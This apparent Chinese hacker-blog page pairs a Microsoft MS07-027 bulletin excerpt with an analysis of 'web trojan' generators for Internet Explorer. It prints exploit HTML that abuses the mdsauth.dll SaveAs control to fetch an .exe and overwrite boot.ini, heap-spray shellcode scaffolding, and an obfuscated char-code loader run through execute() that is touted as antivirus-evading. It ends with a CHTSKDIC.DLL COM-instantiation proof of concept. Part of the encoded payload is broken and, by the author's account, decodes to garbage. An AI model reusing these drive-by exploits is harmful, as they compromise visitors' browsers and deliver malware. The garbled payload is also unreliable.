Microsoft 安全公告 MS07027

Internet Explorer 的累积性安全更新 (931768)发布日期： 五月 8, 2007 | 更新日期： 五月 16, 2007 版本： 1.2 摘要 本文的目标读者： 使用 Microsoft Windows 的客户 漏洞的影响： 远程执行代码 最高严重等级： 严重 建议： 客户应立即应用此更新 安全更新替代： 本公告替代多个以前的安全更新。 有关详细信息，请参阅本公告的“常见问题 (FAQ)”部分。 注意事项： Microsoft 知识库文章 931768 介绍了客户在安装此安全更新时可能遇到的当前已知问题。 本文还介绍了这些问题的建议解决办法。 有关详细信息，请参阅 Microsoft 知识库文章 931768。 测试过的软件和安全更新下载位置： 受影响的软件： • Microsoft Windows 2000 Service Pack 4 • Microsoft Windows XP Service Pack 2 • Microsoft Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2 • Microsoft Windows Server 2003 Service Pack 1 和 Microsoft Windows Server 2003 Service Pack 2 • Microsoft Windows Server 2003 SP1（用于基于 Itanium 的系统）以及 Microsoft Windows Server 2003 SP2（用于基于 Itanium 的系统） • Microsoft Windows Server 2003 x64 Edition Service Pack 1 和 Microsoft Windows Server 2003 x64 Edition Service Pack 2 • Windows Vista • Windows Vista x64 Edition 测试过的 Microsoft Windows 组件： 受影响的组件： • Windows 2000 Service Pack 4 上的 Microsoft Internet Explorer 5.01 Service Pack 4 — 下载此更新 • 安装在 Windows 2000 Service Pack 4 上的 Microsoft Internet Explorer 6 Service Pack 1 — 下载此更新 • Windows XP Service Pack 2 的 Microsoft Internet Explorer 6 — 下载此更新 • Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2 的 Microsoft Internet Explorer 6 — 下载此更新 • Windows Server 2003 Service Pack 1 和 Windows Server 2003 Service Pack 2 的 Microsoft Internet Explorer 6 — 下载此更新 • Windows Server 2003 SP1（用于基于 Itanium 的系统）和 Windows Server 2003 SP2（用于基于 Itanium 的系统）的 Microsoft Internet Explorer 6 — 下载此更新 • Windows Server 2003 x64 Edition Service Pack 1 和 Windows Server 2003 x64 Edition Service Pack 2 的 Microsoft Internet Explorer 6 — 下载此更新 • Windows XP Service Pack 2 的 Microsoft Internet Explorer 7 — 下载此更新 • Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2 的 Windows Internet Explorer 7 — 下载此更新 • Windows Server 2003 Service Pack 1 和 Windows Server 2003 Service Pack 2 的 Windows Internet Explorer 7 — 下载此更新 • Windows Server 2003 SP1（用于基于 Itanium 的系统）和 Windows Server 2003 SP2（用于基于 Itanium 的系统）的 Windows Internet Explorer 7 — 下载此更新 • Windows Server 2003 x64 Edition Service Pack 1 和 Windows Server 2003 x64 Edition Service Pack 2 的 Windows Internet Explorer 7 — 下载此更新 • Windows Vista 中的 Windows Internet Explorer 7 — 下载此更新 • Windows Vista x64 Edition 中的 Windows Internet Explorer 7 — 下载此更新 ----------------------- MS07027漏洞网站挂马分析2007-05-25 19:11 5月16号微软更新了Internet Explorer的这个漏洞补丁。好像这个漏洞并不流行，不过网上已经MS07027漏洞利用的工具了，我所了解的有两款：MS07027网马生成器与最新MS07027+免杀ANI超强高效率网马生成器。 一、MS07027网马生成器会生成一个MS07027.html文件，内容如下： <html> <title> MS07-027 Oday </title> <body> <OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa004254a0"> </OBJECT> <script language="vbscript"> target.SessionDescription="MS07-027 mdsauth.dll Proof of Concept exploit" target.SessionAuthor="Andres Tarasco Acuna" target.SessionEmailContact="atarasco_at_gmail.com" target.SessionURL="http://127.0.0.1/0.exe" target.SaveAs "c:\boot.ini" <script src="inject.js"></script> </script> </body> </html> 这段代码最初是从好友Hysia的博客上看到的，不过这个MS07027网马生成器显然是在骗人！根本没把shellcode拿出来！shellcode应该在inject.js文件里，可是根本就没生成这个js文件，就一个MS07027.html！并且网上也没公布全部的shellcode……仅公布了一部分： function PrepMem() { //Standard Heap Spray Code var heapSprayToAddress = 0x06060606; var payLoadCode = HeapRepairCode + Shellcode; var heapBlockSize = 0x400000; var payLoadSize = payLoadCode.length * 2; var spraySlideSize = heapBlockSize - (payLoadSize+0x38); var spraySlide = unescape("%u9090%u9090"); spraySlide = getSpraySlide(spraySlide,spraySlideSize); heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize; memory = new Array(); for (i=0;i<heapBlocks;i++) { memory = spraySlide + payLoadCode; } function getSpraySlide(spraySlide, spraySlideSize) { while (spraySlide.length*2<spraySlideSize) { spraySlide += spraySlide; } spraySlide = spraySlide.substring(0,spraySlideSize/2); return spraySlide; } } function GetSystemVersion() { //Simple Detecting of OS version out of Jscript version: var ver = ""; ver += ScriptEngineMajorVersion(); ver += ScriptEngineMinorVersion(); ver += ScriptEngineBuildVersion(); if       ( ver<568820 ){ return("preSP2"); } else if ( ver<575730 ){ return("SP2"); } else return (0); } 二、还有那个所谓的“最新MS07027+免杀ANI超强高效率网马生成器”会生成fyms07027.htm这个文件。我的电脑没打这个补丁，于是开了IIS测试。有反应：第一次电脑直接崩溃重启……后面接着测试，发现这个代码的执行速度太慢了，等了半天也没出现预期的结果！就不测试了，fyms07027.htm的源码如下： <html> <body> <SCRIPT language="javascript"> function rechange(k) s=Split(k,",") t="" For i = 0 To UBound(s) t=t+Chr(eval(s(i))) Next rechange=t End Function t="115,104,101,108,108,99,111,100,101,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,52,51,52,51,34,43,34,37,117,52,51,52,51,34,43,34,37,117,52,51,101,98,37,117,53,55,53,54,37,117,52,53,56,98,37,117,56,98,51,99,37,117,48,53,53,52,37,117,48,49,55,56,37,117,53,50,101,97,37,117,53,50,56,98,37,117,48,49,50,48,37,117,51,49,101,97,37,117,51,49,99,48,37,117,52,49,99,57,37,117,51,52,56,98,37,117,48,49,56,97,37,117,51,49,101,101,37,117,99,49,102,102,37,117,49,51,99,102,37,117,48,49,97,99,37,117,56,53,99,55,37,117,55,53,99,48,37,117,51,57,102,54,37,117,55,53,100,102,37,117,53,97,101,97,37,117,53,97,56,98,37,117,48,49,50,52,37,117,54,54,101,98,37,117,48,99,56,98,37,117,56,98,52,98,37,117,49,99,53,97,37,117,101,98,48,49,37,117,48,52,56,98,37,117,48,49,56,98,37,117,53,102,101,56,37,117,102,102,53,101,37,117,102,99,101,48,37,117,99,48,51,49,37,117,56,98,54,52,37,117,51,48,52,48,37,117,52,48,56,98,37,117,56,98,48,99,37,117,49,99,55,48,37,117,56,98,97,100,37,117,48,56,54,56,37,117,99,48,51,49,37,117,98,56,54,54,37,117,5 4,99,54,99,37,117,54,56,53,48,37,117,51,50,51,51,37,117,54,52,50,101,37,117,55,55,54,56,37,117,51,50,55,51,37,117,53,52,53,102,37,117,55,49,98,98,37,117,101,56,97,55,37,117,101,56,102,101,37,117,102,102,57,48,37,117,102,102,102,102,37,117,101,102,56,57,37,117,99,53,56,57,37,117,99,52,56,49,37,117,102,101,55,48,37,117,102,102,102,102,37,117,51,49,53,52,37,117,102,101,99,48,37,117,52,48,99,52,37,117,98,98,53,48,37,117,55,100,50,50,37,117,55,100,97,98,37,117,55,53,101,56,37,117,102,102,102,102,37,117,51,49,102,102,37,117,53,48,99,48,37,117,53,48,53,48,37,117,52,48,53,48,37,117,52,48,53,48,37,117,98,98,53,48,37,117,53,53,97,54,37,117,55,57,51,52,37,117,54,49,101,56,37,117,102,102,102,102,37,117,56,57,102,102,37,117,51,49,99,54,37,117,53,48,99,48,37,117,51,53,53,48,37,117,48,49,48,50,37,117,99,99,55,48,37,117,99,99,102,101,37,117,56,57,53,48,37,117,53,48,101,48,37,117,49,48,54,97,37,117,53,54,53,48,37,117,56,49,98,98,37,117,50,99,98,52,37,117,101,56,98,101,37,117,102,102,52,50,37,117,102,102,102,102,37,117,99,48,5 1,49,37,117,53,54,53,48,37,117,100,51,98,98,37,117,53,56,102,97,37,117,101,56,57,98,37,117,102,102,51,52,37,117,102,102,102,102,37,117,54,48,53,56,37,117,49,48,54,97,37,117,53,48,53,52,37,117,98,98,53,54,37,117,102,51,52,55,37,117,99,54,53,54,37,117,50,51,101,56,37,117,102,102,102,102,37,117,56,57,102,102,37,117,51,49,99,54,37,117,53,51,100,98,37,117,50,101,54,56,37,117,54,100,54,51,37,117,56,57,54,52,37,117,52,49,101,49,37,117,100,98,51,49,37,117,53,54,53,54,37,117,53,51,53,54,37,117,51,49,53,51,37,117,102,101,99,48,37,117,52,48,99,52,37,117,37,117,99,48,51,49,37,117,98,56,54,54,37,117,54,99,54,99,37,117,54,56,53,48,37,117,51,50,51,51,37,117,54,52,50,101,37,117,55,55,54,56,37,117,51,50,55,51,37,117,53,52,53,102,37,117,55,49,98,98,37,117,101,56,97,55,37,117,101,56,102,101,37,117,102,102,57,48,37,117,102,102,102,102,37,117,101,102,56,57,37,117,99,53,56,57,37,117,99,52,56,49,37,117,102,101,55,48,37,117,102,102,102,102,37,117,51,49,53,52,37,117,102,101,99,48,37,117,52,48,99,52,37,117,98,98,53,48,37,117,55,100,50 ,50,37,117,55,100,97,98,37,117,55,53,101,56,37,117,102,102,102,102,37,117,51,49,102,102,37,117,53,48,99,48,37,117,53,48,53,48,37,117,52,48,53,48,37,117,52,48,53,48,37,117,98,98,53,48,37,117,53,53,97,54,37,117,55,57,51,52,37,117,54,49,101,56,37,117,102,102,102,102,37,117,56,57,102,102,37,117,51,49,99,54,37,117,53,48,99,48,37,117,51,53,53,48,37,117,48,49,48,50,37,117,99,99,55,48,37,117,99,99,102,101,37,117,56,57,53,48,37,117,53,48,101,48,37,117,49,48,54,97,37,117,53,54,53,48,37,117,56,49,98,98,37,117,50,99,98,52,37,117,101,56,98,101,37,117,102,102,52,50,37,117,102,102,102,102,37,117,99,48,51,49,37,117,53,54,53,48,37,117,100,51,98,98,37,117,53,56,102,97,37,117,101,56,57,98,37,117,102,102,51,52,37,117,102,102,102,102,37,117,54,48,53,56,37,117,49,48,54,97,37,117,53,48,53,52,37,117,98,98,53,54,37,117,102,51,52,55,37,117,99,54,53,54,37,117,50,51,101,56,37,117,102,102,102,102,37,117,56,57,102,102,37,117,51,49,99,54,37,117,53,51,100,98,37,117,50,101,54,56,37,117,54,100,54,51,37,117,56,57,54,52,37,117,52,49,101,49,37,1 17,100,98,51,49,37,117,53,54,53,54,37,117,53,51,53,54,37,117,51,49,53,51,37,117,102,101,99,48,37,117,52,48,99,52,37,117,13,10,53,51,53,48,37,117,53,51,53,51,37,117,53,51,53,51,37,117,53,51,53,51,37,117,53,51,53,51,37,117,54,97,53,51,37,117,56,57,52,52,37,117,53,51,101,48,37,117,53,51,53,51,37,117,53,52,53,51,37,117,53,51,53,48,37,117,53,51,53,51,37,117,53,51,52,51,37,117,53,51,52,98,37,117,53,49,53,51,37,117,56,55,53,51,37,117,98,98,102,100,37,117,100,48,50,49,37,117,100,48,48,53,37,117,100,102,101,56,37,117,102,102,102,101,37,117,53,98,102,102,37,117,99,48,51,49,37,117,53,48,52,56,37,117,98,98,53,51,37,117,99,98,52,51,37,117,53,102,56,100,37,117,99,102,101,56,37,117,102,102,102,101,37,117,53,54,102,102,37,117,101,102,56,55,37,117,49,50,98,98,37,117,54,100,54,98,37,117,101,56,100,48,37,117,102,101,99,50,37,117,102,102,102,102,37,117,99,52,56,51,37,117,54,49,53,99,37,117,56,57,101,98,34,41,59,10,13,10,98,105,103,98,108,111,99,107,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,48,68,48,68,37,117,48,68,48,6 8,34,41,59,10,13,10,104,101,97,100,101,114,115,105,122,101,32,61,32,50,48,59,10,13,10,115,108,97,99,107,115,112,97,99,101,32,61,32,104,101,97,100,101,114,115,105,122,101,43,115,104,101,108,108,99,111,100,101,46,108,101,110,103,116,104,13,10,10,119,104,105,108,101,32,40,98,105,103,98,108,111,99,107,46,108,101,110,103,116,104,60,115,108,97,99,107,115,112,97,99,101,41,32,98,105,103,98,108,111,99,107,43,61,98,105,103,98,108,111,99,107,59,13,10,10,102,105,108,108,98,108,111,99,107,32,61,32,98,105,103,98,108,111,99,107,46,115,117,98,115,116,114,105,110,103,40,48,44,32,115,108,97,99,107,115,112,97,99,101,41,59,10,98,108,111,99,107,32,61,32,98,105,103,98,108,111,99,107,46,115,117,98,115,116,114,105,110,103,40,48,44,32,98,105,103,98,108,111,99,107,46,108,101,110,103,116,104,45,115,108,97,99,107,115,112,97,99,101,41,59,13,10,10,119,104,105,108,101,40,98,108,111,99,107,46,108,101,110,103,116,104,43,115,108,97,99,107,115,112,97,99,101,60,48,120,52,48,48,48,48,41,32,98,108,111,99,107,32,61,32,98,108,111,99,107,43,98,108,1 11,99,107,43,102,105,108,108,98,108,111,99,107,59,13,10,10,109,101,109,111,114,121,32,61,32,110,101,119,32,65,114,114,97,121,40,41,59,10,102,111,114,32,40,105,61,48,59,105,60,55,53,48,59,105,43,43,41,32,109,101,109,111,114,121,91,105,93,32,61,32,98,108,111,99,107,32,43,32,115,104,101,108,108,99,111,100,101,59,10" i=t execute(rechange(I)) </SCRIPT> <object classid="CLSID:03D9F3F2-B0E3-11D2-B081-006008039BF0"></object> <!--这个object不是MS07027漏洞的object，这要注意--> Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit by the FrSIRT < http://www.fy.com > Solution - http://www.fy.com/</body><script>location.reload();</script> </html> 完全解密后，发现是奇怪的乱码。不知道为什么……谁有兴趣可以去解密，也可以运行这段代码看看。估计就是由于这些原因限制了MS07027漏洞的利用吧。看了好多可以利用的漏洞，还是MS07017与MS06014这两个漏洞经典！ --------------- 今天终于调试出来了，效果与06014基本一样,全过杀毒软件,只公开,部分调试代码,因为怕天下大乱,所以暂时只公布部分的调试代码! <html> <title> MS07-027 mdsauth.dll NMSA Session Description Object SaveAs control, arbitrary file modification </title> <body> <OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa004254a0"> </OBJECT> <script language="vbscript"> //next script is converted to UTF16 target.SessionDescription="MS07-027 mdsauth.dll Proof of Concept exploit" target.SessionAuthor="Andres Tarasco Acuna" target.SessionEmailContact="atarasco_at_gmail.com" target.SessionURL="http://192.168.1.168/1.exe" target.SaveAs "c:\boot.ini" <script src="inject.js"></script> </script> </body> </html> 以下是部分shellcode ===========///ms07-027 exploit ///================ function PrepMem() { //Standard Heap Spray Code var heapSprayToAddress = 0x06060606; var payLoadCode = HeapRepairCode + Shellcode; var heapBlockSize = 0x400000; var payLoadSize = payLoadCode.length * 2; var spraySlideSize = heapBlockSize - (payLoadSize+0x38); var spraySlide = unescape("%u9090%u9090"); spraySlide = getSpraySlide(spraySlide,spraySlideSize); heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize; memory = new Array(); for (i=0;i<heapBlocks;i++) { memory[i] = spraySlide + payLoadCode; } function getSpraySlide(spraySlide, spraySlideSize) { while (spraySlide.length*2<spraySlideSize) { spraySlide += spraySlide; } spraySlide = spraySlide.substring(0,spraySlideSize/2); return spraySlide; } } function GetSystemVersion() { //Simple Detecting of OS version out of Jscript version: var ver = ""; ver += ScriptEngineMajorVersion(); ver += ScriptEngineMinorVersion(); ver += ScriptEngineBuildVersion(); if      ( ver<568820 ){ return("preSP2"); } else if ( ver<575730 ){ return("SP2"); } else return (0); } 我会做个演示动画给大家看的,这只是部分代码! ------------------------- 测试方法： 警 告 以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！ =============== CHTSKDIC.DLL.htm start ================ <!-- // Internet Explorer (CHTSKDIC.DLL) COM Object Instantiation Vulnerability // tested XP SP2 CN // http://www.xsec.org // nop (nop#xsec.org) // CLSID: {BE4191FB-59EF-4825-AEFC-109727951E42} // Info: ImeSingleKanjiDict// ProgID: ID2 // InprocServer32: C:\WINDOWS\IME\CHTIME\APPLETS\CHTSKDIC.DLL !--> <html><body> <object classid="CLSID:{BE4191FB-59EF-4825-AEFC-109727951E42}" ></object> </body></html> =============== CHTSKDIC.DLL.htm end ==================